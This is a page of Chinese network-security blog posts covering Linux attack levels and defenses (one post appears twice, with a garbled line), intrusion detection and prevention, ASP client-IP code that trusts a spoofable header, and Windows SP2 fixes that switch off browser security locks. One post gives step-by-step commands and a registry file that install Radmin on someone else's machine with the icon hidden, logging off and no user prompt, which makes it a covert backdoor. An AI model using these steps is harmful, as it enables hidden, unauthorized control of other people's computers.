Submitted by 海东青 on 2009, February 25, 2:40 PM
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。
对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器。对Linux服务器攻击有许多种类,本文从攻击深度的角度说明,我们把攻击分为四级。
攻击级别一:服务拒绝攻击(DoS)
由于DoS攻击工具的泛滥,及所针对的协议层的缺陷短时无法改变的事实,DoS也就成为了流传最广、最难防范的攻击方式。
服务拒绝攻击包括分布式拒绝服务攻击、反射式分布拒绝服务攻击、DNS分布拒绝服务攻击、FTP攻击等。大多数服务拒绝攻击导致相对低级的危险,即便是那些可能导致系统重启的攻击也仅仅是暂时性的问题。这类攻击在很大程度上不同于那些想获取网络控制的攻击,一般不会对数据安全有影响,但是服务拒绝攻击会持续很长一段时间,非常难缠。
到目前为止,没有一个绝对的方法可以制止这类攻击。但这并不表明我们就应束手就擒,除了强调个人主机加强保护不被利用的重要性外,加强对服务器的管理是非常重要的一环。一定要安装验证软件和过滤功能,检验该报文的源地址的真实地址。另外对于几种服务拒绝可以采用以下措施:关闭不必要的服务、限制同时打开的Syn半连接数目、缩短Syn半连接的time out 时间、及时更新系统补丁。
攻击级别二:本地用户获取了他们非授权的文件的读写权限
本地用户是指在本地网络的任一台机器上有口令、因而在某一驱动器上有一个目录的用户。本地用户获取到了他们非授权的文件的读写权限的问题是否构成危险很大程度上要看被访问文件的关键性。任何本地用户随意访问临时文件目录(/tmp)都具有危险性,它能够潜在地铺设一条通向下一级别攻击的路径。
级别二的主要攻击方法是:黑客诱骗合法用户告知其机密信息或执行任务,有时黑客会假装网络管理人员向用户发送邮件,要求用户给他系统升级的密码。
由本地用户启动的攻击几乎都是从远程登录开始。对于Linux服务器,最好的办法是将所有shell账号放置于一个单独的机器上,也就是说,只在一台或多台分配有shell访问的服务器上接受注册。这可以使日志管理、访问控制管理、释放协议和其他潜在的安全问题管理更容易些。还应该将存放用户cgI的系统区分出来。这些机器应该隔离在特定的网络区段,也就是说,根据网络的配置情况,它们应该被路由器或网络交换机包围。其拓扑结构应该确保硬件地址欺骗也不能超出这个区段。
攻击级别三:远程用户获得特权文件的读写权限
第三级别的攻击能做到的不只是核实特定文件是否存在,而且还能读写这些文件。造成这种情况的原因是:Linux服务器配置中出现这样一些弱点:即远程用户无需有效账号就可以在服务器上执行有限数量的命令。
密码攻击法是第三级别中的主要攻击法,损坏密码是最常见的攻击方法。密码破解是用以描述在使用或不使用工具的情况下渗透网络、系统或资源以解锁用密码保护的资源的一个术语。用户常常忽略他们的密码,密码政策很难得到实施。黑客有多种工具可以击败技术和社会所保护的密码。主要包括:字典攻击(Dictionary attack)、混合攻击(Hybrid attack)、蛮力攻击(Brute force attack)。一旦黑客拥有了用户的密码,他就有很多用户的特权。密码猜想是指手工进入普通密码或通过编好程序的正本取得密码。一些用户选择简单的密码—如生日、纪念日和配偶名字,却并不遵循应使用字母、数字混合使用的规则。对黑客来说要猜出一串8个字生日数据不用花多长时间。
防范第三级别的攻击的最好的防卫方法便是严格控制进入特权,即使用有效的密码。
◆ 主要包括密码应当遵循字母、数字、大小写(因为Linux对大小写是有区分)混合使用的规则。
◆ 使用象“#”或“%”或“"countbak"一词,它后面添加“##
攻击级别四:远程用户获得根权限
第四攻击级别是指那些决不应该发生的事发生了,这是致命的攻击。表示攻击者拥有Linux服务器的根、超级用户或管理员许可权,可以读、写并执行所有文件。换句话说,攻击者具有对Linux服务器的全部控制权,可以在任何时刻都能够完全关闭甚至毁灭此网络。攻击级别四主要攻击形式是TCP/IP连续偷窃,被动通道听取和信息包拦截。TCP/IP连续偷窃,被动通道听取和信息包拦截,是为进入网络收集重要信息的方法,不像拒绝服务攻击,这些方法有更多类似偷窃的性质,比较隐蔽不易被发现。一次成功的TCP/IP攻击能让黑客阻拦两个团体之间的交易,提供中间人袭击的良好机会,然后黑客会在不被受害者注意的情况下控制一方或双方的交易。通过被动窃听,黑客会操纵和登记信息,把文件送达,也会从目标系统上所有可通过的通道找到可通过的致命要害。黑客会寻找联机和密码的结合点,认出申请合法的通道。信息包拦截是指在目标系统约束一个活跃的听者程序以拦截和更改所有的或特别的信息的地址。信息可被改送到非法系统阅读,然后不加改变地送回给黑客。
TCP/IP连续偷窃实际就是网络嗅探,注意如果您确信有人接了嗅探器到自己的网络上,可以去找一些进行验证的工具。这种工具称为时域反射计量器(Time Domain Reflectometer,TDR)。TDR对电磁波的传播和变化进行测量。将一个TDR连接到网络上,能够检测到未授权的获取网络数据的设备。不过很多中小公司没有这种价格昂贵的工具。
对于防范嗅探器的攻击最好的方法是:
1、安全的拓扑结构。嗅探器只能在当前网络段上进行数据捕获。这就意味着,将网络分段工作进行得越细,嗅探器能够收集的信息就越少。
2、会话加密。不用特别地担心数据被嗅探,而是要想办法使得嗅探器不认识嗅探到的数据。这种方法的优点是明显的:即使攻击者嗅探到了数据,这些数据对他也是没有用的。
特别提示:应对攻击的反击措施
对于超过第二级别的攻击您就要特别注意了。因为它们可以不断的提升攻击级别,以渗透Linux服务器。此时,我们可以采取的反击措施有:
◆ 首先备份重要的企业关键数据。
◆ 改变系统中所有口令,通知用户找系统管理员得到新口令。
◆ 隔离该网络网段使攻击行为仅出现在一个小范围内。
◆ 允许行为继续进行。如有可能,不要急于把攻击者赶出系统,为下一步作准备。
◆ 记录所有行为,收集证据。这些证据包括:系统登录文件、应用登录文件、AAA(Authentication、Authorization、 Accounting,认证、授权、计费)登录文件,RADIUS(Remote Authentication Dial-In User Service) 登录,网络单元登录(Network Element Logs)、防火墙登录、HIDS(Host-base IDS,基于主机的入侵检测系统) 事件、NIDS(网络入侵检测系统)事件、磁盘驱动器、隐含文件等。收集证据时要注意:在移动或拆卸任何设备之前都要拍照;在调查中要遵循两人法则,在信息收集中要至少有两个人,以防止篡改信息;应记录所采取的所有步骤以及对配置设置的任何改变,要把这些记录保存在安全的地方。检查系统所有目录的存取许可,检测Permslist是否被修改过。
◆ 进行各种尝试(使用网络的不同部分)以识别出攻击源。
◆ 为了使用法律武器打击犯罪行为,必须保留证据,而形成证据需要时间。为了做到这一点,必须忍受攻击的冲击(虽然可以制定一些安全措施来确保攻击不损害网络)。对此情形,我们不但要采取一些法律手段,而且还要至少请一家有权威的安全公司协助阻止这种犯罪。这类操作的最重要特点就是取得犯罪的证据、并查找犯罪者的地址,提供所拥有的日志。对于所搜集到的证据,应进行有效地保存。在开始时制作两份,一个用于评估证据,另一个用于法律验证。
◆ 找到系统漏洞后设法堵住漏洞,并进行自我攻击测试。
网络安全已经不仅仅是技术问题,而是一个社会问题。企业应当提高对网络安全重视,如果一味地只依靠技术工具,那就会越来越被动;只有发挥社会和法律方面打击网络犯罪,才能更加有效。我国对于打击网络犯罪已经有了明确的司法解释,遗憾的是大多数企业只重视技术环节的作用而忽略法律、社会因素,这也是本文的写作目的。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:79
Submitted by 海东青 on 2009, February 25, 2:40 PM
网络安全技术发展到今天,除了防火墙和杀毒系统的防护,入侵检测技术也成为抵御黑客攻击的有效方式。尽管入侵检测技术还在不断完善发展之中,但是入侵检测产品的市场已经越来越大,真正掀起了网络安全的第三股热潮。
入侵检测技术是为保证计算机系统的安全而设计与配置的一种能够及时发现并报告系统中未授权或异常现象的技术,是一种用于检测计算机网络中违反安全策略行为的技术。
入侵检测被认为是防火墙之后的第二道安全闸门。IDS主要用来监视和分析用户及系统的活动,可以识别反映已知进攻的活动模式并向相关人士报警。对异常行为模式,IDS要以报表的形式进行统计分析。产品提供的功能还要评估重要系统和数据文件的完整性。
一个成功的入侵检测系统,不仅可使系统管理员时刻了解网络系统,还能给网络安全策略的制订提供依据。它应该管理配置简单,使非专业人员非常容易地获得网络安全。入侵检测的规模还应根据网络规模、系统构造和安全需求的改变而改变。入侵检测系统在发现入侵后,会及时作出响应,包括切断网络连接、记录事件和报警等。IDS分类入侵检测通过对入侵行为的过程与特征进行研究,使安全系统对入侵事件和入侵过程作出实时响应。
IDS产品分类
目前市场上的IDS产品从技术上看,基本可分为两大类:基于网络的产品和基于主机的产品。混合的入侵检测系统可以弥补一些基于网络与基于主机的片面性缺陷。此外,文件的完整性检查工具也可看做是一类入侵检测产品。
基于网络的入侵检测产品放置在比较重要的网段内,对每一个数据包或可疑的数据包进行特征分析。商品化的产品包括:国外的ISS RealSecure Network Sensor、Cisco Secure IDS、CA e-Trust IDS、Axent的NetProwler,以及国内的金诺网安KIDS、北方计算中心NISDetector、启明星辰天阗黑客入侵检测与预警系统和中科网威“天眼”网络入侵侦测系统等。
基于主机的入侵检测产品主要对主机的网络实时连接以及系统审计日志进行智能分析和判断。基于主机的入侵检测系统有:ISS RealSecure OS Sensor、Emerald expert-BSM、金诺网安KIDS等。
混合式入侵检测系统综合了基于网络和主机的两种结构特点,既可发现网络中的攻击信息,也可从系统日志中发现异常情况。商品化产品有:ISS Server Sensor、NAI CyberCop Monitor、金诺网安KIDS等。
文件完整性检查工具通过检查文件的数字摘要与其他一些属性,判断文件是否被修改,从而检测出可能的入侵。这个领域的产品有半开放源代码的Tripwire。
IDS产品形式
绝大多数的入侵检测产品都以纯软件的形式出售,但为了达到性能最佳,往往需要对安装的系统进行优化调整。这样,把产品做成“黑盒子”的形式可以达到目的,如Cisco公司的Secure IDS和金诺网安KIDS。
随着入侵检测产品日益在规模庞大的企业中应用,分布式技术也开始融入到入侵检测产品中来。同时,集中管理多个传感器的中央控制台也在不断地完善。目前,绝大多数的入侵检测产品,尤其是企业级产品都具有分布式结构。
产品重要指标
在入侵检测产品中,有几个重要的性能指标值得重视,比如网络入侵检测系统负载能力,网络入侵检测系统是非常消耗资源的,但很少有厂商公布自己的pps (packet per second)参数。
网络入侵检测系统可支持的网络类型也是应该考虑的。目前,国内的入侵检测厂商还只是支持以太网和快速以太网。
网络入侵检测系统运行在什么操作系统平台上,网络入侵检测系统的运行平台一般以Unix为主,也有少数使用专有设备或基于Windows平台的入侵检测系统。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:79
Submitted by 海东青 on 2009, February 25, 2:40 PM
正如我们大家所知道的那样,互联网的无处不在已经完全改变了我们所知道的网络。过去完全孤立的网络现在连接到了全世界。这种无处不在的连接使企业能够完成过去不可想象的任务。然而,与此同时还存在一个黑暗面。互联网变成了网络犯罪分子的天堂。这些网络犯罪分子利用这种连接向企业发起了数量空前的多的攻击。当互联网最初开始流行的时候,企业开始认识到它们应该使用防火墙防止对它们实施的攻击。防火墙通过封锁没有使用的TCP和UDP端口发挥作用。虽然防火墙在封锁某些端口的攻击是有效的,但是,有些端口对于HTTP、SMTP和POP3通信是有用的。为了保证这些服务工作正常,对这些常用的服务的对应的端口必须要保持开放的状态。问题是,黑客已经学会了如何让恶意通信通过这些通常开放的端口。
为了应付这种威胁,一些公司开始应用入侵检测系统(IDS)。IDS的思路是监视经过你的防火墙的全部通信并且查找可能是恶意的通信。这个思路在理论上是非常好的,但是,在实际上,IDS系统由于某些原因的影响工作得并不好。
早期的IDS系统通过查找任何异常的通信发挥作用。当检测到异常的通信时,这种行动将被记录下来并且向管理员发出警报。这个过程很少出现问题。对于初始者来说,查找异常通信方式会产生很多错误的报告。经过一段时间之后,管理员会对收到过多的错误警报感到厌烦,从而完全忽略IDS系统的警告。
IDS系统的另一个主要缺陷是它们仅监视主要的通信。如果检测到一种攻击,它将提醒管理员采取行动。人们认为IDS系统采取的这种方法是很好的。总之,由于IDS系统会产生很多的错误报告,你真的愿意让IDS系统对合法的网络通信采取行动吗?
在过去的几年里,IDS系统已经有了很大的进步。目前,IDS系统的工作方式更像是一种杀毒软件。IDS系统包含一个名为攻击签名的数据库。这个系统不断地把入网的通信与数据库中的信息进行比较。如果检测到攻击行动,IDS系统就发出这个攻击的报告。
比较新的IDS系统比以前的系统更准确一些。但是,这个数据库需要不断地更新以保持有效性。而且,如果发生了攻击并且在数据库中没有相匹配的签名,这个攻击可能就会被忽略。即使这个攻击被检测到了并且被证实是一种攻击,IDS系统除了向管理员发出警报和记录这个攻击之外没有力量做出任何事情。
这就是入侵防御系统(IPS)的任务了。IPS与IDS类似,但是,IPS在设计上解决了IDS的一些缺陷。
对于初始者来说,IPS位于你的防火墙和网络的设备之间。这样,如果检测到攻击,IPS会在这种攻击扩散到网络的其它地方之前阻止这个恶意的通信。相比之下,IDS只是存在于你的网络之外起到报警的作用,而不是在你的网络前面起到防御的作用。
IPS检测攻击的方法也与IDS不同。目前有很多种IPS系统,它们使用的技术都不相同。但是,一般来说,IPS系统都依靠对数据包的检测。IPS将检查入网的数据包,确定这种数据包的真正用途,然后决定是否允许这种数据包进入你的网络。
正如你所看到的,IDS和IPS系统有一些重要的区别。如果你要购买有效的安全设备,如果你使用IPS而不是使用IDS,你的网络通常会更安全。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:78
Submitted by 海东青 on 2006, April 3, 11:16 AM
分级防御对Linux系统服务器的攻击及相应解决方案
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。
对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器。对Linux服务器攻击有许多种类,本文从攻击深度的角度说明,我们把攻击分为四级。
攻击级别一:服务拒绝攻击(DoS)
由于DoS攻击工具的泛滥,及所针对的协议层的缺陷短时无法改变的事实,DoS也就成为了流传最广、最难防范的攻击方式。
服务拒绝攻击包括分布式拒绝服务攻击、反射式分布拒绝服务攻击、DNS分布拒绝服务攻击、FTP攻击等。大多数服务拒绝攻击导致相对低级的危险,即便是那些可能导致系统重启的攻击也仅仅是暂时性的问题。这类攻击在很大程度上不同于那些想获取网络控制的攻击,一般不会对数据安全有影响,但是服务拒绝攻击会持续很长一段时间,非常难缠。
防范第一级别的攻击方法:
[separator]
到目前为止,没有一个绝对的方法可以制止这类攻击。但这并不表明我们就应束手就擒,除了强调个人主机加强保护不被利用的重要性外,加强对服务器的管理是非常重要的一环。一定要安装验证软件和过滤功能,检验该报文的源地址的真实地址。另外对于几种服务拒绝可以采用以下措施:关闭不必要的服务、限制同时打开的Syn半连接数目、缩短Syn半连接的time out 时间、及时更新系统补丁。
攻击级别二:本地用户获取了他们非授权的文件的读写权限
本地用户是指在本地网络的任一台机器上有口令、因而在某一驱动器上有一个目录的用户。本地用户获取到了他们非授权的文件的读写权限的问题是否构成危险很大程度上要看被访问文件的关键性。任何本地用户随意访问临时文件目录(/tmp)都具有危险性,它能够潜在地铺设一条通向下一级别攻击的路径。
级别二的主要攻击方法是:黑客诱骗合法用户告知其机密信息或执行任务,有时黑客会假装网络管理人员向用户发送邮件,要求用户给他系统升级的密码。
防范第二级别的攻击方法:
由本地用户启动的攻击几乎都是从远程登录开始。对于Linux服务器,最好的办法是将所有shell账号放置于一个单独的机器上,也就是说,只在一台或多台分配有shell访问的服务器上接受注册。这可以使日志管理、访问控制管理、释放协议和其他潜在的安全问题管理更容易些。还应该将存放用户CGI的系统区分出来。这些机器应该隔离在特定的网络区段,也就是说,根据网络的配置情况,它们应该被路由器或网络交换机包围。其拓扑结构应该确保硬件地址欺骗也不能超出这个区段。
攻击级别三:远程用户获得特权文件的读写权限
第三级别的攻击能做到的不只是核实特定文件是否存在,而且还能读写这些文件。造成这种情况的原因是:Linux服务器配置中出现这样一些弱点:即远程用户无需有效账号就可以在服务器上执行有限数量的命令。
密码攻击法是第三级别中的主要攻击法,损坏密码是最常见的攻击方法。密码破解是用以描述在使用或不使用工具的情况下渗透网络、系统或资源以解锁用密码保护的资源的一个术语。用户常常忽略他们的密码,密码政策很难得到实施。黑客有多种工具可以击败技术和社会所保护的密码。主要包括:字典攻击(Dictionary attack)、混合攻击(Hybrid attack)、蛮力攻击(Brute force attack)。一旦黑客拥有了用户的密码,他就有很多用户的特权。密码猜想是指手工进入普通密码或通过编好程序的正本取得密码。一些用户选择简单的密码—如生日、纪念日和配偶名字,却并不遵循应使用字母、数字混合使用的规则。对黑客来说要猜出一串8个字生日数据不用花多长时间。
防范第三级别的攻击防卫方法:便是严格控制进入特权,即使用有效的密码。
◆ 主要包括密码应当遵循字母、数字、大小写(因为Linux对大小写是有区分)混合使用的规则。
◆ 使用象“#”或“%”或“$”这样的特殊字符也会添加复杂性。例如采用"countbak"一词,在它后面添加“#$”(countbak#$),这样您就拥有了一个相当有效的密码。
攻击级别四:远程用户获得根权限
第四攻击级别是指那些决不应该发生的事发生了,这是致命的攻击。表示攻击者拥有Linux服务器的根、超级用户或管理员许可权,可以读、写并执行所有文件。换句话说,攻击者具有对Linux服务器的全部控制权,可以在任何时刻都能够完全关闭甚至毁灭此网络。
攻击级别四主要攻击形式是TCP/IP连续偷窃,被动通道听取和信息包拦截。TCP/IP连续偷窃,被动通道听取和信息包拦截,是为进入网络收集重要信息的方法,不像拒绝服务攻击,这些方法有更多类似偷窃的性质,比较隐蔽不易被发现。一次成功的TCP/IP攻击能让黑客阻拦两个团体之间的交易,提供中间人袭击的良好机会,然后黑客会在不被受害者注意的情况下控制一方或双方的交易。通过被动窃听,黑客会操纵和登记信息,把文件送达,也会从目标系统上所有可通过的通道找到可通过的致命要害。黑客会寻找联机和密码的结合点,认出申请合法的通道。信息包拦截是指在目标系统约束一个活跃的听者程序以拦截和更改所有的或特别的信息的地址。信息可被改送到非法系统阅读,然后不加改变地送回给黑客。
防范第四级别的攻击防卫方法:
TCP/IP连续偷窃实际就是网络嗅探,注意如果您确信有人接了嗅探器到自己的网络上,可以去找一些进行验证的工具。这种工具称为时域反射计量器(Time Domain Reflectometer,TDR)。TDR对电磁波的传播和变化进行测量。将一个TDR连接到网络上,能够检测到未授权的获取网络数据的设备。不过很多中小公司没有这种价格昂贵的工具。对于防范嗅探器的攻击最好的方法是:
1、安全的拓扑结构。嗅探器只能在当前网络段上进行数据捕获。这就意味着,将网络分段工作进行得越细,嗅探器能够收集的信息就越少。
2、会话加密。不用特别地担心数据被嗅探,而是要想办法使得嗅探器不认识嗅探到的数据。这种方法的优点是明显的:即使攻击者嗅探到了数据,这些数据对他也是没有用的。
特别提示:应对攻击的反击措施
对于超过第二级别的攻击您就要特别注意了。因为它们可以不断的提升攻击级别,以渗透Linux服务器。此时,我们可以采取的反击措施有:
◆ 首先备份重要的企业关键数据。
◆ 改变系统中所有口令,通知用户找系统管理员得到新口令。
◆ 隔离该网络网段使攻击行为仅出现在一个小范围内。
◆ 允许行为继续进行。如有可能,不要急于把攻击者赶出系统,为下一步作准备。
◆ 记录所有行为,收集证据。这些证据包括:系统登录文件、应用登录文件、AAA(Authentication、Authorization、 Accounting,认证、授权、计费)登录文件,RADIUS(Remote Authentication Dial-In User Service) 登录,网络单元登录(Network Element Logs)、防火墙登录、HIDS(Host-base IDS,基于主机的入侵检测系统) 事件、NIDS(网络入侵检测系统)事件、磁盘驱动器、隐含文件等。收集证据时要注意:在移动或拆卸任何设备之前都要拍照;在调查中要遵循两人法则,在信息收集中要至少有两个人,以防止篡改信息;应记录所采取的所有步骤以及对配置设置的任何改变,要把这些记录保存在安全的地方。检查系统所有目录的存取许可,检测Permslist是否被修改过。
◆ 进行各种尝试(使用网络的不同部分)以识别出攻击源。
◆ 为了使用法律武器打击犯罪行为,必须保留证据,而形成证据需要时间。为了做到这一点,必须忍受攻击的冲击(虽然可以制定一些安全措施来确保攻击不损害网络)。对此情形,我们不但要采取一些法律手段,而且还要至少请一家有权威的安全公司协助阻止这种犯罪。这类操作的最重要特点就是取得犯罪的证据、并查找犯罪者的地址,提供所拥有的日志。对于所搜集到的证据,应进行有效地保存。在开始时制作两份,一个用于评估证据,另一个用于法律验证。
◆ 找到系统漏洞后设法堵住漏洞,并进行自我攻击测试。
网络安全已经不仅仅是技术问题,而是一个社会问题。企业应当提高对网络安全重视,如果一味地只依靠技术工具,那就会越来越被动;只有发挥社会和法律方面打击网络犯罪,才能更加有效。我国对于打击网络犯罪已经有了明确的司法解释,遗憾的是大多数企业只重视技术环节的作用而忽略法律、社会因素,这也是本文的写作目的。
什么是拒绝服务攻击(DoS)?
DoS即Denial Of Service,拒绝服务的缩写,可不能认为是微软的DOS操作系统!DoS攻击即让目标机器停止提供服务或资源访问,通常是以消耗服务器端资源为目标,通过伪造超过服务器处理能力的请求数据造成服务器响应阻塞,使正常的用户请求得不到应答,以实现攻击目的。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:85
Submitted by 海东青 on 2006, February 20, 10:14 PM
在ASP中使用 Request.ServerVariables("REMOTE_ADDR") 来取得客户端的IP地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的IP地址,而不是真正的客户端IP地址。要想透过代理服务器取得客户端的真实IP地址,就要使用 Request.ServerVariables("HTTP_X_FORWARDED_FOR") 来读取。不过要注意的事,并不是每个代理服务器都能用 Request.ServerVariables("HTTP_X_FORWARDED_FOR") 来读取客户端的真实 IP,有些用此方法读取到的仍然是代理服务器的IP。还有一点需要注意的是:如果客户端没有通过代理服务器来访问,那么用 Request.ServerVariables ("HTTP_X_FORWARDED_FOR") 取到的值将是空的。因此,如果要在程序中使用此方法,可以这样处理:
......
userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR")
......
即:如果客户端通过代理服务器,则取 HTTP_X_FORWARDED_FOR 的值,如果没通过代理服务器,就取 REMOTE_ADDR 的值。
通用函数:如果不能取客户端真实IP,就会取客户端的代理IP
[acronym=]Private Function getIP()
Dim strIPAddr
If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
strIPAddr = Request.ServerVariables("REMOTE_ADDR")
ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
Else
strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
End If
getIP = Trim(Mid(strIPAddr, 1, 30))
End Function[/acronym]
网络安全 | 评论:0
| Trackbacks:0
| 阅读:79
Submitted by 海东青 on 2006, February 20, 10:13 PM
我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了, 它的缺点太多,例如要依赖IPC$,日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台,但缺点是隐藏图标的问题,我不会编程,当然无法去除图标,还有就是 VNC 功能很少。radmin 就不同了,它的特色有:速度快隐藏图标,COPY文件,telnet 等功能。安装也及其简单:
首先要在自己的机子上安装,在设置完端口,密码,隐藏图标后,从注册表导出
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 起名为radmin.reg
内容大概如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[separator][HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:64,19,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b
解释一下 "DisableTrayIcon"=hex:01,00,00,00 里的01表示隐藏图标,改成00,图标就会显示 。"Port"=hex:当然是端口,这里是6500。 "Parameter"=hex:是密码。
其他的就不用管了。
现在我们将
AdmDll.dll
raddrv.dll
r_server.exe
radmin.reg
复制到对方的c:\winnt\system32下。
然后在对方机器上运行:
regedit /s radmin.reg
r_server /install /silence
net start r_server
马上连接即可,速度还不错。并且它还自带了ftp和telnet,在实际中有很大用处。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:82
Submitted by 海东青 on 2006, February 20, 10:12 PM
有些朋友在安装了Windows SP2之后,发现上网时网页图片无法正常显示、网站验证码看不见、BT软件下载速度减慢、即时通信软件不通等各种故障接二连三地暴露出来。之所以造成这种问题一方面是由于SP2起点太高,对系统的改动太多造成的;另一方面则是因为我们大家还不熟悉SP2这一新生事物。现在就让我们再一次走近SP2,着重分析一些SP2容易引起的常见系统故障,对症下药,不让SP2成为我们系统的绊脚石。
这种故障的现象为安装SP2后,McAfee VirusScan无法在线升级。
分析造成这种故障的原因可以得知,从系统安全角度出发,SP2对各种组件的管理十分严格,设置的权限较低,McAfee VirusScan就是其中的一个。因其权限不够,所以会造成无法在线升级故障。
对于这个"绊脚石"的应对策略是,依次点击"开始"|"设置"|"控制面板"|"管理工具"|"组件服务"选项,打开"组件服务"窗口。展开"控制台根目录"|"组件服务"|"计算机"|"我的电脑"|"DOCM配置"|"FrameworkService"选项,在其上右键单击,调出属性窗口。点选"安全"选项卡,在"启动与激活权限"栏目中点选"自定义"单选按钮。接着点击"编辑"按钮,在弹出的"启动权限"对话框中,点击"添加"按钮,将你的登录帐号和"System"帐号添加进来,并"允许"其具有"本地启动"、"本地激活"权限,如图1所示,点"确定"按钮即可。
这种故障的现象则为,在用IE浏览器浏览网页的过程中,当打开一些包含有图片的HTML网页时,弹出[separator]ActiveX错误信息,图片无法正常显示。
究其原因,是为了防范计算机受到恶意的攻击,默认情况下,SP2禁用了ActiveX、java等控件,这样就造成了包含有ActiveX、java等控件的网页无法正常浏览,图片无法正常显示。对这种问题,可以采用如下方法:
打开记事本程序,录入以下内容:
Windows Registry Editor Version 5.00 (此处空一行)
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternetExplorerMainFeature-ControlFEATURE_LOCALMACHINE_LOCKDOWN]
@=""
"iexplore.exe"=dword:00000000
"explorer.exe"=dword:00000000
需要注意的是,上述两个键值为"1"时为禁用,为"0"时为解禁ActiveX、java等控件。录入完毕,另存为"ShowPicture.reg",文件名任取,扩展名必须是REG,双击导入到注册表中去即可。
在安装SP2前,我们可以随意地调整Internet域的安全等级,但是在安装了SP2之后,你会发现Internet的安全等级被锁定到中级,当我们试图调整时,会弹出一个"错误"警告框,如图2所示,我们无法再按各人的实际需要来调整安全等级。
这个问题主要是因为SP2出于安全的考虑,锁定了Internet的安全等级,默认情况下不允许用户来调整。
面对这个问题,可以采取的方法为:点击"开始"|"运行",在弹出的运行对话框中输入"REGEDIT",回车后打开注册表编辑器。依次展开如下分支:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion
InternetSettingsZones],在右侧的窗口中找到名为"MinLevel"的Dword值并双击它,在弹出的编辑对话框中将其数值数据设为"10000 "(十六进制)后点"确定"按钮并关闭注册表编辑器。按F5刷新一下,现在再试试,看安全等级是不是可以自由调整了。
这种故障通常表现为安装SP2后,往往会与Office XP等普遍软件产生兼容性问题,程序莫名其妙出错。
造成该问题的元凶主要是DEP数据执行预防技术,DEP(Date Execution Prevention)技术主要是为有效避免缓冲区溢出问题而设计的,它可以有效防止病毒或恶意程序在电脑受保护的内存位置存放运行有害代码,DEP会将某些常用的内存位置标记为"不可执行",从而让病毒或恶意代码无生存之处,但它同时也导致了一些程序无法正常运行。
我们可以通过手动配置,让某一个程序不受DEP检测,就可避免DEP产生的兼容性问题。方法如下:
在桌面上右键单击"我的电脑",在弹出的右键菜单中选择"属性"。在弹出的"系统属性"窗口中,点击"高级"选项卡,接着点击"性能"栏目中的"设置"按钮。在弹出的"性能选项"对话框中,点击"数据执行保护"选项卡,点选中"为除下列选定程序之外的所有程序和服务执行DEP",然后通过"添加"按钮,将你所需要的程序添加进来即可。
与SP2产生兼容性问题的程序还有很多,限于篇幅,笔者在这里就不一一罗列了,有兴趣的朋友可以参考"Http://support.microsoft.com/?id=884130"上的技术文档。
现如今,使用网络的人恐怕很少有不使用BT下载软件的,BT软件给我们带来了酣畅淋漓的下载体验和资源共享的另类方法。但是安装SP2之后,原来奇快的下载速度突然之间就减慢了,将BT软件卸载重装也解决不了问题。
造成这个问题的原因是,为有效防止冲击波、震荡波之类的蠕虫病毒的多线程攻击,SP2内建了一个OOB Messages动态链接库,该动态链接库会实时监控每一个进程的并发线程数,只要超过了它认为的安全线程数(10个),就开始屏蔽掉部分线程,以减少线程数。
要解决该问题,必须修改位于"E:WINDOWSServicePackFilesi386"目录下的"TCPIP.sys",但是手动修改比较麻烦,现在已经有高手为我们做成了补丁,你只需要下载安装即可(可以到《个人电脑》网站的下载频道http://www.pcpro.com.cn/club/download/index.php下载并安装)。下载完毕,在命令行下运行该程序,在询问的时候,回答"Y",然后退出命令行,重新启动计算机即可。
这种故障发生时,往往表现为下载到本地的IE文件,原来均为可以正常显示包含有FLASH动画的IE文件,安装SP2之后,却无法显示FLASH动画了。
